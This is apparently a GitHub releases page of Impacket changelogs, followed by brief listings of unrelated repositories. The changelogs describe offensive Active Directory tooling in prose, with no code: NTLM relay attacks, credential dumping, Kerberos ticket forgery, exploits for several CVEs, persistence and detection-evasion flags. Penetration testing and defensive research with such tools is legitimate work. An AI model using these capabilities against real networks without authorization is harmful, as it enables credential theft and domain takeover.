        • Updated intro to not trigger the AV on windows (@mpgn)
      • ntlmrelayx.py:
        • Implemented RAW Relay Server (@CCob)
        • Added an LDAP attack dumping information about the domain's ADCS enrollment services (@SAERXCIT)
        • Added multi-relay feature to the HTTP Relay Server. Now one incoming HTTP connection could be used against multiple targets (@0xdeaddood)
        • Added an option to disable the multi-relay feature (@zblurx and @0xdeaddood)
        • Added multiple HTTP listeners running at the same time (@SAERXCIT)
        • Support for the ADCS ESC1 and ESC6 attacks (@hugo-syn)
        • Added Shadow Credentials attack (@ShutdownRepo, @Tw1sm, @nodauf and @p0dalirius)
        • Added the ability to define a password for the LDAP attack addComputer (@ShutdownRepo)
        • Added rename_computer and modify add_computer in LDAP interactive shell (@capnkrunchy)
        • Implemented StartTLS (@ThePirateWhoSmellsOfSunflowers)
      • reg.py:
        • Added save function to allow remote saving of registry hives (@ShutdownRepo and @scopedsecurity)
      • secretsdump.py:
        • Added an option to dump credentials using the Kerberos Key List attack (@0xdeaddood)
      • smbpasswd.py:
        • Added an option to force credentials change via injecting new values into SAM (@snovvcrash and @Alef-Burzmali!)
    3. New examples

      • machine_role.py: This script retrieves a host's role along with its primary domain details (@simondotsh)
      • keylistattack.py: This example implements the Kerberos Key List attack to dump credentials abusing RODCs and Azure AD Kerberos Servers (@0xdeaddood)

    As always, thanks a lot to all these contributors that make this library better every day (since last version):

    @rmaksimov @simondotsh @CCob @raithedavion @SAERXCIT @Maltemo @dirkjanm @reznok @ShutdownRepo @scopedsecurity @Tw1sm @nodauf @p0dalirius @zblurx @hugo-syn @capnkrunchy @mohemiv @mpgn @rtpt-jonaslieb @snovvcrash @Alef-Burzmali @ThePirateWhoSmellsOfSunflowers @jlvcm

    Source code(tar.gz)
    Source code(zip)
    impacket-0.10.0.tar.gz(1.37 MB)
  • impacket_0_9_24(Oct 27, 2021)

    Project's main page at https://www.secureauth.com/labs/open-source-tools/impacket/

    ChangeLog for 0.9.24:

    1. Library improvements

      • Fixed WMI objects parsing (@franferrax)
      • Added the RpcAddPrinterDriverEx method and related structures to [MS-RPRN]: Print System Remote Protocol (@cube0x0)
      • Initial implementation of [MS-PAR]: Print System Asynchronous Remote Protocol (@cube0x0)
      • Complying MS-RPCH with HTTP/1.1 (@mohemiv)
      • Added return of server time in case of Kerberos error (@ShutdownRepo and @Hackndo)
    2. Examples improvements

      • getST.py:
        • Added support for a custom additional ticket for S4U2Proxy (@ShutdownRepo)
      • ntlmrelayx.py:
        • Added Negotiate authentication support to the HTTP server (@LZD-TMoreggia)
        • Added anonymous session handling in the HTTP server (@0xdeaddood)
        • Fixed error in ldapattack.py when trying to escalate with machine account (@Rcarnus)
        • Added the implementation of AD CS attack (@ExAndroidDev)
        • Disabled the anonymous logon in the SMB server (@ly4k)
      • psexec.py:
        • Fixed decoding problems on multi bytes characters (@p0dalirius)
      • reg.py:
        • Implemented ADD and DELETE functionalities (@Gifts)
      • secretsdump.py:
        • Speeding up NTDS parsing (@skelsec)
      • smbclient.py:
        • Added 'mget' command which allows the download of multiple files (@deadjakk)
        • Handling empty search count in FindFileBothDirectoryInfo (@martingalloar)
      • smbpasswd.py:
        • Added the ability to change a user's password providing NTLM hashes (@snovvcrash)
      • smbserver.py:
        • Added NULL SMBv2 client connection handling (@0xdeaddood)
        • Hardened path checks and Added TID checks (@martingalloar)
        • Added SMB2 support to QUERY_INFO Request and Enabled SMB_COM_FLUSH method (@0xdeaddood)
        • Added missing constant and structure for the QUERY_FS Information Level SMB_QUERY_FS_DEVICE_INFO (@martingalloar)
      • wmipersist.py:
        • Fixed VBA script execution and improved error checking (@franferrax)
    3. New examples

      • rbcd.py: Example script for handling the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer (@ShutdownRepo and @p0dalirius) (based on the previous work of @tothi and @NinjaStyle82)

    As always, thanks a lot to all these contributors that make this library better every day (since last version):

    @deadjakk @franferrax @cube0x0 @w0rmh013 @skelsec @mohemiv @LZD-TMoreggia @exploide @ShutdownRepo @Hackndo @snovvcrash @rmaksimov @Gifts @Rcarnus @ExAndroidDev @ly4k @p0dalirius

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.24.tar.gz(1.57 MB)
  • impacket_0_9_23(Jun 9, 2021)

    Project's main page at https://www.secureauth.com/labs/open-source-tools/impacket/

    ChangeLog for 0.9.23:

    1. Library improvements

      • Support connect timeout with SMBTransport (@vruello)
      • Speeding up DcSync (@mohemiv)
      • Fixed Python3 issue when serving SOCKS5 requests (@agsolino)
      • Moved docker container to Python 3.8 (@mgallo)
      • Added basic GitHub Actions workflow (@mgallo)
      • Fixed Path Traversal vulnerabilities in smbserver.py - CVE-2021-31800 (@omriinbar AppSec Researcher at CheckMarx)
      • Fixed POST request processing in httprelayserver.py (@Rcarnus)
      • Added cat command to smbclient.py (@mxrch)
      • Added new features to the LDAP Interactive Shell to facilitate AD exploitation (@AdamCrosser)
      • Python 3.9 support (@meeuw and @cclauss)
    2. Examples improvements

      • addcomputer.py:
        • Enable the machine account created via SAMR (@0xdeaddood)
      • getST.py:
        • Added exploit for CVE-2020-17049 - Kerberos Bronze Bit attack (@jakekarnes42)
        • Compute NTHash and AESKey for the Bronze Bit attack automatically (@snovvcrash)
      • ntlmrelayx.py:
        • Fixed target parsing error (@0xdeaddood)
      • wmipersist.py:
        • Fixed filterBinding error (@franferrax)
        • Added PowerShell option for semi-interactive shells in dcomexec.py, smbexec.py and wmiexec.py (@snovvcrash)
        • Added new parameter to select COMVERSION in dcomexec.py, wmiexec.py, wmipersist.py and wmiquery.py (@zexusx26)
    3. New examples

      • Get-GPPPassword.py: This example extracts and decrypts Group Policy Preferences passwords using streams for treating files instead of mounting shares. Additionally, it can parse GPP XML files offline (@ShutdownRepo and @p0dalirius)
      • smbpasswd.py: This script is an alternative to smbpasswd tool and intended to be used for changing expired passwords remotely over SMB (MSRPC-SAMR) (@snovvcrash)

    As always, thanks a lot to all these contributors that make this library better every day (since last version):

    @mpgn @vruello @mohemiv @jagotu @jakekarnes42 @snovvcrash @zexusx26 @omriinbar @Rcarnus @nuschpl @mxrch @ShutdownRepo @p0dalirius @AdamCrosser @franferrax @meeuw and @cclauss

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.23.tar.gz(1.32 MB)
  • impacket_0_9_22(Nov 23, 2020)

    Project's main page at https://www.secureauth.com/labs/impacket/

    ChangeLog for 0.9.22:

    1. Library improvements

      • Added implementation of RPC over HTTP v2 protocol (by @mohemiv).
      • Added MS-NSPI, MS-OXNSPI and MS-OXABREF protocol implementations (by @mohemiv).
      • Improved the multi-page results in LDAP queries (by @ThePirateWhoSmellsOfSunflowers).
      • NDR parser optimization (by @mohemiv).
      • Improved serialization of WMI method parameters (by @tshmul).
      • Introduce the MS-NLMP 2.2.2.10 VERSION structure in NTLMAuthNegotiate messages (by @franferrax).
      • Added some NETLOGON structs for NetrServerPasswordSet2 (by @dirkjanm).
      • Python 3.8 support.
    2. Examples improvements

      • atexec.py: Fixed after MS patches related to RPC attacks (by @mohemiv).
      • dpapi.py: Added -no-pass, pass-the-hash and AES Key support for backup subcommand.
      • GetNPUsers.py: Added ability to enumerate targets with Kerberos KRB5CC (by @rmaksimov).
      • GetUserSPNs.py: Added new features for kerberoasting (by @mohemiv).
      • ntlmrelayx.py:
        • Added ability to relay on new Windows versions that have SMB guest access disabled by default.
        • Added option to specify the NTLM Server Challenge used when receiving a connection.
        • Added relaying to RPC support (by @mohemiv).
        • Implemented WCFRelayServer (by @cnotin).
        • Added Zerologon DCSync Relay Client (by @dirkjanm).
        • Fixed issue in ldapattack.py when relaying and creating computer in CN=Computers (by @Hackndo).
      • rpcdump.py: Added RPC over HTTP v2 support (by @mohemiv).
      • secretsdump.py:
        • Added ability to specifically delete a shadow based on its ID (by @phefley).
        • Dump plaintext machine account password when dumping the local registry secrets(by @dirkjanm).
    3. New examples

      • exchanger.py: A tool for connecting to MS Exchange via RPC over HTTP v2 (by @mohemiv).
      • rpcmap.py: Scan for listening DCE/RPC interfaces (by @mohemiv).

    As always, thanks a lot to all these contributors that make this library better every day (since last version): @mohemiv @mpgn @Romounet @ThePirateWhoSmellsOfSunflowers @rmaksimov @fuzzKitty @tshmul @spinenkoia @AaronRobson @ABCIFOGeowi40 @cclauss @cnotin @5alt @franferrax @Dliv3 @dirkjanm @Mr-Gag @vbersier @phefley @Hackndo

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.22.tar.gz(1.30 MB)
  • impacket_0_9_21(Mar 26, 2020)

    Project's main page at www.secureauth.com

    ChangeLog for 0.9.21:

    1. Library improvements

      • New methods into CCache class to import/export kirbi (KRB-CRED) formatted tickets (by @Zer1t0).
      • Add FSCTL_SRV_ENUMERATE_SNAPSHOTS functionality to SMBConnection (by @rxwx).
      • Changes in NetBIOS classes in nmb.py (select() by poll() read from socket) (by @cnotin).
      • Timestamped logging added.
      • Interactive shell to perform LDAP operations (by @mlefebvre).
      • Added two DCE/RPC calls in tsch.py (by @mohemiv).
      • Single-source the version number and standardize on symantic + pre-release + local versioning (by @jsherwood0).
      • Added implementation for keytab files (by @kcirtapw).
      • Added SMB 3.1.1 support for Client SMB Connections.
    2. Examples improvements

      • smbclient.py: List the VSS snapshots for a specified path (by @rxwx).
      • GetUserSPNs.py: Added delegation information associated with accounts (by @G0ldenGunSec).
      • dpapi.py:
        • Added more functions to decrypt masterkeys based on SID + hashes/key. Also support supplying hashes instead of the password for decryption(by @dirkjanm).
        • Pass the hash support for backup key retrieval (by @imaibou).
        • Added feature to decrypt a user's masterkey using the MS-BKRP (by @imaibou).
      • raiseChild.py: Added a new flag to specify the RID of a user to dump credentials (by @0xdeaddood).
      • Added flags to bypass badly made detection use cases (by @MaxNad):
        • smbexec.py: Possibility to rename the PSExec uploaded binary name with the -remote-binary-name flag.
        • psexec.py: Possibility to use another service name with the -service-name flag.
      • ntlmrelayx.py:
        • Added a flag to use a SID as the escalate user for delegation attacks(by @0xe7).
        • Support for dumping LAPS passwords (by @praetorian-adam-crosser).
        • Added LDAP interactive mode that allow an attacker to manually perform basic operations like creating a new user, adding a user to a group , dump the AD, etc. (by @mlefebvre).
        • Support for multiple relays through one SMB connection (by @0xdeaddood).
        • Added support for dumping gMSA passwords (by @cube0x0).
      • ticketer.py: Added an option to use the SPNs keys from a keytab for a silver ticket.(by @kcirtapw)
    3. New Examples

      • addcomputer.py: Allows add a computer to a domain using LDAP or SAMR (SMB) (by @jagotu)
      • ticketConverter.py: This script converts kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa (by @Zer1t0).
      • findDelegation.py: Simple script to quickly list all delegation relationships (unconstrained, constrained, resource-based constrained) in an AD environment (by @G0ldenGunSec).

    As always, thanks a lot to all these contributors that make this library better every day (since last version):

    @jagotu, @Zer1t0 ,@rxwx, @mpgn, @danhph, @awsmhacks, @slasyz, @cnotin, @exploide, @G0ldenGunSec, @dirkjanm, @0xdeaddood, @MaxNad, @imaibou, @BarakSilverfort, @0xe7, @mlefebvre, @rmaksimov, @praetorian-adam-crosser, @jsherwood0, @mohemiv, @justin-p, @cube0x0, @spinenkoia, @kcirtapw, @MrAnde7son, @fridgehead, @MarioVilas.

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.21.tar.gz(1.21 MB)
  • impacket_0_9_20(Sep 25, 2019)

    Project's main page at www.secureauth.com

    ChangeLog for 0.9.20:

    1. Library improvements

      • Python 3.6 support! This is the first release supporting Python 3.x so please issue tickets whenever you find something not working as expected. Libraries and examples should be fully functional.
      • Test coverage improvements by @infinnovation-dev
      • Anonymous SMB 2.x Connections are not encrypted anymore (by @cnotin)
      • Support for multiple PEKs when decrypting Windows 2016 DIT files (by @mikeryan)
    2. Examples improvements

      • ntlmrelayx.py:
        1. CVE-2019-1019: Bypass SMB singing for unpatched (by @msimakov)
        2. Added POC code for CVE-2019-1040 (by @dirkjanm)
        3. Added NTLM relays leveraging Webdav authentications (by @salu90)
    3. New Examples

      • kintercept.py: A tool for intercepting krb5 connections and for testing KDC handling S4U2Self with unkeyed checksum (by @iboukris)

    As always, thanks a lot to all these contributors that make this library better every day (since last version): @infinnovation-dev, @cnotin, @mikeryan, @SR4ven, @cclauss, @skorov, @msimakov, @dirkjanm, @franferrax, @iboukris, @n1ngod, @c0d3z3r0, @MrAnde7son.

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.20.tar.gz(3.69 MB)
  • impacket_0_9_19(Apr 1, 2019)

    Project's main page at www.secureauth.com

    ChangeLog for 0.9.19:

    1. Library improvements

      • [MS-EVEN] Interface implementation (Initial - by @MrAnde7son )
    2. Examples improvements

    As always, thanks a lot to all these contributors that make this library better every day (since last version): @dirkjanm, @MrAnde7son, @ibo, @franferrax, @Qwokka, @CaledoniaProject , @eladshamir, @Zer1t0, @martingalloar, @muizzk, @Petraea, @SR4ven, @Fist0urs, @Zer1t0

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.19.tar.gz(1.17 MB)
  • impacket_0_9_18(Dec 5, 2018)

    Project's main page at www.secureauth.com

    ChangeLog for 0.9.18:

    1. Library improvements

      • Replace unmaintained PyCrypto for pycryptodome (@dirkjanm)
      • Using cryptographically secure pseudo-random generators
      • Kerberos "no pre-auth and RC4" handling in GetKerberosTGT (by @qlemaire)
      • Test cases adjustments, travis and flake support (@cclauss)
      • Python3 test cases fixes (@eldipa)
      • Adding DPAPI / Vaults related structures and functions to decrypt secrets.
      • [MS-RPRN] Interface implementation (Initial)
    2. Examples improvements

      • ntlmrelayx.py: Optimize ACL enumeration and improve error handling in ntlmrelayx LDAP attack (by @dirkjanm)
      • secretsdump.py: Added dumping of machine account Kerberos keys (@dirkjanm). DPAPI_SYSTEM LSA Secret is now parsed and key contents are shown.
      • GetUserSPNs.py: Bugfixes and cross-domain support (@dirkjanm)
    3. New Examples

      • dpapi.py: Allows decrypting vaults, credentials and masterkeys protected by DPAPI. Domain backup key support added by @MrAnde7son

    As always, thanks a lot to all these contributors that make this library better every day (since last version): @dirkjanm, @MrAnde7son, @franferrax, @MrRobot86, @qlemaire, @cauan, @eldipa

    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.18.tar.gz(1.16 MB)
  • impacket_0_9_17(May 30, 2018)

    Project's main page at www.coresecurity.com

    ChangeLog for 0.9.17:

    1. Library improvements

      • New [MS-PAC] Implementation.
      • LDAP engine: Added extensibleMatch string filter parsing, simple paging support and handling of unsolicited notification (by @kacpern)
      • ImpactDecoder: Add EAPOL, BOOTP and DHCP packet decoders (by Michael Niewoehner)
      • Kerberos engine: DES-CBC-MD5 support to kerberos added (by @skelsec)
      • SMB3 engine: If target server supports SMB >= 3, encrypt packets by default.
      • Initial [MS-DHCPM] and [MS-EVEN6] Interface implementation by @MrAnde7son
      • Major improvements to the NetBIOS layer. More use of structure.py in there.
      • MQTT Protocol Implementation and example.
      • Tox/Coverage Support added, test cases moved to its own directory. Major overhaul.
      • Many fixes and improvements in Kerberos, SMB and DCERPC (too much to name in a few lines).
    2. Examples improvements

      • GetUserSPNs.py: -request-user parameter added. Requests STs for the SPN associated to the user specified. Added support for AES Kerberoast tickets (by @elitest).
      • services.py: added port 139 support and related options (by @real-datagram).
      • samrdump.py: -csv switch to output format in CSV added.
      • ntlmrelayx.py: Major architecture overhaul. Now working mostly through dynamically loaded plugins. SOCKS proxy support for relayed connections. Specific attacks for every protocol and new protocols support (IMAP, POP3, SMTP). Awesome contributions by @dirkjanm.
      • secretsdump.py : AES(128) support for SAM hashes decryption. OldVal parameter dump added to LSA secrets dump (by @Ramzeth).
      • mssqlclient.py: Alternative method to execute cmd's on MSSQL (sp_start_job). (by @Kayzaks).
      • lsalookupsid.py: added no-pass and domain-users options (by @ropnop).
    3. New Examples

      • ticketer.py: Create Golden/Silver tickets from scratch or based on a template (legally requested from the KDC) allowing you to customize some of the parameters set inside the PAC_LOGON_INFO structure, in particular the groups, extrasids, duration, etc. Silver tickets creation by @machosec and @bransh.
      • GetADUsers.py: Gathers data about the domain's users and their corresponding email addresses. It will also include some extra information about last logon and last password set attributes.
      • getPac.py: Gets the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. It does so by using a mix of [MS-SFU]'s S4USelf + User to User Kerberos Authentication.
      • getArch.py: Will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab)using a documented MSRPC feature.
      • mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi.
      • sambaPipe.py: Will exploit CVE-2017-7494, uploading and executing the shared library specified by the user through the -so parameter.
      • dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects. (contributions by @byt3bl33d3r).
      • getTGT.py: Given a password, hash or aesKey, this script will request a TGT and save it as ccache.
      • getST.py: Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf other user.

    As always, thanks a lot to all these contributors that make this library better every day (since last version): @dirkjanm, @real-datagram, @kacpern, @martinuy, @xelphene, @blark, @the-useless-one, @contactr2m, @droc, @martingalloar, @skelsec, @franferrax, @Fr0stbyt3, @ropnop, @MrAnde7son, @machosec, @federicoemartinez, @elitest, @symeonp, @Kanda-Motohiro, @Ramzeth, @mohemiv, @arch4ngel, @derekchentrendmicro, @Kayzaks, @donwayo, @bao7uo, @byt3bl33d3r, @xambroz, @luzpaz, @TheNaterz, @Mikkgn, @derUnbekannt.

    Source code(tar.gz)
    Source code(zip)
  • impacket_0_9_15(Jun 28, 2016)

    Project's main page at www.coresecurity.com

    ChangeLog for 0.9.15:

    1. Library improvements
    • SMB3.create(): define CreateContextsOffset and CreateContextsLength when applicable (by @rrerolle)
    • Retrieve user principal name from CCache file allowing to call any script with -k and just the target system (by @MrTchuss)
    • Packet fragmentation for DCE RPC layer mayor overhaul.
    • Improved pass-the-key attacks scenarios (by @skelsec)
    • Adding a minimalistic LDAP/s implementation (supports PtH/PtT/PtK). Only search is available (and you need to build the search filter yourself)
    • IPv6 improvements for DCERPC/LDAP and Kerberos
    1. Examples improvements
      • Adding -dc-ip switch to all examples. It allows to specify what the IP for the domain is. It assumes the DC and KDC resides in the same server
      • secretsdump.py
        • Adding support for Win2016 TP4 in LOCAL or -use-vss mode
        • Adding -just-dc-user switch to download just a single user data (DRSUAPI mode only)
        • Support for different ReplEpoch (DRSUAPI only)
        • pwdLastSet is also included in the output file
        • New structures/flags added for 2016 TP5 PAM support
      • wmiquery.py
        • Adding -rpc-auth-level switch (by @gadio)
      • smbrelayx.py
        • Added option to specify authentication status code to be sent to requesting client (by @mgeeky)
        • Added one-shot parameter. After successful authentication, only execute the attack once for each target (per protocol)
    2. New Examples
      • GetUserSPNs.py: This module will try to find Service Principal Names that are associated with normal user account. This is part of the kerberoast attack researched by Tim Medin (@timmedin)
      • ntlmrelayx.py: smbrelayx.py on steroids!. NTLM relay attack from/to multiple protocols (HTTP/SMB/LDAP/MSSQL/etc) (by @dirkjanm)
    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.15.tar.gz(1.02 MB)
  • impacket_0_9_14(Jan 7, 2016)

    1. Library improvements:
      • [MS-TSCH] - ATSVC, SASec and ITaskSchedulerService Interface implementations
      • [MS-DRSR] - Directory Replication Service DRSUAPI Interface implementation
      • Network Data Representation (NDR) runtime overhaul. Big performance and reliability improvements achieved
      • Unicode support (optional) for the SMBv1 stack (by @rdubourguais)
      • NTLMv2 enforcement option on SMBv1 client stack (by @scriptjunkie)
      • Kerberos support for TDS (MSSQL)
      • Extended present flags support on RadioTap class
      • Old DCERPC runtime code removed
    2. Examples improvements:
      • mssqlclient.py: Added Kerberos authentication support
      • atexec.py: It now uses ITaskSchedulerService interface, adding support for Windows 2012 R2
      • smbrelayx.py:
        • If no file to upload and execute is specified (-E) it just dumps the target user's hashes by default
        • Added -c option to execute custom commands in the target (by @byt3bl33d3r)
      • secretsdump.py:
        • Active Directory hashes/Kerberos keys are dumped using [MS-DRSR]-(IDL_DRSGetNCChanges method) by default. VSS method is still available by using the -use-vss switch
        • Added -just-dc (Extract only NTDS.DIT NTLM Hashes and Kerberos) and -just-dc-ntlm ( only NTDS.DIT NTLM Hashes ) options
        • Added resume capability (only for NTDS in DRSUAPI mode) in case the connection drops. Use -resumefile option
        • Added Primary:CLEARTEXT Property from supplementalCredentials attribute dump
        • Add support for multiple password encryption keys (PEK) (by @s0crat)
      • goldenPac.py: Tests all DCs in domain and adding forest's enterprise admin group inside PAC
    3. New examples:
      • raiseChild.py: Child domain to forest privilege escalation exploit. Implements a child-domain to forest privilege escalation as detailed by Sean Metcalf (@PyroTek3) at https://adsecurity.org/?p=1640. It (ab)uses the concept of Golden Tickets and ExtraSids researched and implemented by Benjamin Delpy (@gentilkiwi) in mimikatz
      • netview.py: Gets a list of the sessions opened at the remote hosts and keep track of them (original idea by @mubix)
    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.14.tar.gz(1013.87 KB)
  • impacket_0_9_13(May 4, 2015)

    May 2015 - 0.9.13:

    1. Library improvements
    • Kerberos support for SMB and DCERPC featuring:

      a. kerberosLogin() added to SMBConnection (all SMB versions). b. Support for RPC_C_AUTHN_GSS_NEGOTIATE at the DCERPC layer. This will negotiate Kerberos. This also includes DCOM. c. Pass-the-hash, pass-the-ticket and pass-the-key support. d. Ccache support, compatible with Kerberos utilities (kinit, klist, etc). e. Support for RC4, AES128_CTS_HMAC_SHA1_96 and AES256_CTS_HMAC_SHA1_96 ciphers. f. Support for RPC_C_AUTHN_LEVEL_PKT_PRIVACY/RPC_C_AUTHN_LEVEL_PKT_INTEGRITY.

    • SMB3 encryption support. Pycrypto experimental version that supports AES_CCM is required.

    • [MS-SAMR]: Supplemental Credentials support (used by secretsdump.py)

    • SMBSERVER improvements:

      a. SMB2 (2.002) dialect experimental support. b. Adding capability to export to John The Ripper format files

    • Library logging overhaul. Now there's a single logger called 'impacket'.

    1. Examples improvements:
    • Added Kerberos support to all modules (incl. pass-the-ticket/key)
    • Ported most of the modules to the new dcerpc.v5 runtime.
    • secretsdump.py: Added dumping Kerberos keys when parsing NTDS.DIT
    • smbserver.py: support for SMB2 (not enabled by default)
    • smbrelayx.py: Added support for MS15-027 exploitation.
    1. New examples:
    • goldenPac.py: MS14-068 exploit. Saves the golden ticket and also launches a psexec session at the target.
    • karmaSMB.py: SMB Server that answers specific file contents regardless of the SMB share and pathname requested.
    • wmipersist.py: Creates persistence over WMI. Adds/Removes WMI Event Consumers/Filters to execute VBS based on a WQL filter or timer specified.
    • netview.py: Gets a list of the sessions opened at the remote hosts looping over the hosts found keeping track of who logged in/out from remote servers
    Source code(tar.gz)
    Source code(zip)
    impacket-0.9.13.tar.gz(1018.32 KB)
Owner
SecureAuth Corporation
SecureAuth is an identity security company that enables the most secure and flexible authentication experience for employees, partners and customers.
SecureAuth Corporation
EUserv - A Python script which can help you renew your free EUserv IPv6 VPS

English | 简体中文 This project comes from https://github.com/a-beam-of-light/eu_ex

阿两 0 Jan 06, 2022
KoreaVPN - Create a VPN App for Mac Using Automator

VPN app 만들기 (a.k.a. KoreaVPN) VPN을 사용하기 위해 들어가는 10초의 시간을 아끼고, 귀찮음을 최소화 하기 위해 크롤링

DongHee 6 Jan 17, 2022
Tiny Interactive File Transfer Application

TIFTA: Tiny Interactive File Transfer Application This repository holds all the source code, tests and documentation of the TIFTA software. The main g

Jorge Martínez 2 Dec 08, 2021
Nexum is an open-source, remote administration tool written in Python 3

A full-featured remote administration tool written in Python 3. The goal of this project is to make the use of a remote administration tool as simple

z3phyrus 2 Nov 26, 2021
pfSense integration with Home Assistant

hass-pfsense Join pfSense with home-assistant! hass-pfsense uses the built-in xmlrpc service of pfSense for all interactions. No special plugins or so

Travis Glenn Hansen 105 Dec 24, 2022
MS Iot Device Can Platform

Kavo MS IoT Platform Version: 2.0 Author: Luke Garceau Requirements Read CAN messages in real-time Convert the given variables to engineering useful v

Luke Garceau 1 Oct 13, 2021
Simple DNS resolver for asyncio

Simple DNS resolver for asyncio aiodns provides a simple way for doing asynchronous DNS resolutions using pycares. Example import asyncio import aiodn

Saúl Ibarra Corretgé 471 Dec 27, 2022
A script for generating WireGuard configs from Surfshark VPN

Surfshark WireGuard A script for generating WireGuard configs from Surfshark VPN. You must have python3 available on your machine. Usage Currently we

Alireza Ahmand 58 Dec 23, 2022
Ipscanner - A simple threaded IP-Scanner written in python3 that can monitor local IP's in your network

IPScanner 🔬 A simple threaded IP-Scanner written in python3 that can monitor lo

4 Dec 12, 2022
DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.

What is DNSStager? DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS. DNSStager will create a malic

Askar 547 Dec 20, 2022
Py script to aid in setting up the boot chime in OpenCore.

BootChime Py script to aid in setting up the boot chime in OpenCore. It does so by helping you locate your IOHDACodecDevices, IOHDACodecAddress values

CorpNewt 7 Sep 19, 2022
pyngrok is a Python wrapper for ngrok

pyngrok is a Python wrapper for ngrok that manages its own binary, making ngrok available via a convenient Python API.

Alex Laird 329 Dec 31, 2022
This is a top level socket library, making servers and clients EASY!

quick-net Sockets don't have to be a pain That's the motto this library was built with, and that's exactly what we made! This is a top-level socket li

Nate the great 15 Dec 17, 2021
TicTacToe using Socket Server

TicTacToe using Socket Server This is a project for the class : 18CSC302J - Computer Networks by Dr. S.Babu Contributors Suvodeep Sinha RA191100301010

Suvodeep Sinha 12 Nov 30, 2022
A vpn that sits in your browser, accessible via a website

VPNInYourBrowser A vpn that sits in your browser, accessible via a website Example setup: https://VPNInBrowser.jaffa42.repl.co Setup Put the code onto

1 Jan 20, 2022
Utility for converting IP Fabric webhooks into a Teams format.

IP Fabric Webhook Integration for Microsoft Teams Setup IP Fabric Setup Go to Settings Webhooks Add webhook Provide a name URL will be: 'http://Y

Community Fabric 1 Jan 26, 2022
Automated network configuration backups using Github actions and git-scraping

Network Config Scraper This repository demonstrates the use of Github Actions and git-scraping to build an automated backup solution for network confi

WWT 19 Dec 14, 2022
Rufus is a Dos tool written in Python3.

🦎 Rufus 🦎 Rufus is a simple but powerful Denial of Service tool written in Python3. The type of the Dos attack is TCP Flood, the power of the attack

Billy 88 Dec 20, 2022
Asyncer, async and await, focused on developer experience

Asyncer, async and await, focused on developer experience. Documentation: https:

Sebastián Ramírez 895 Dec 28, 2022
Connection package to a raspberry or any other machine using ssh, it simplifies the deployment scripts and monitoring.

Connection package to a raspberry or any other machine using ssh, it simplifies the deployment scripts and monitoring.

Dashstrom 7 Mar 29, 2022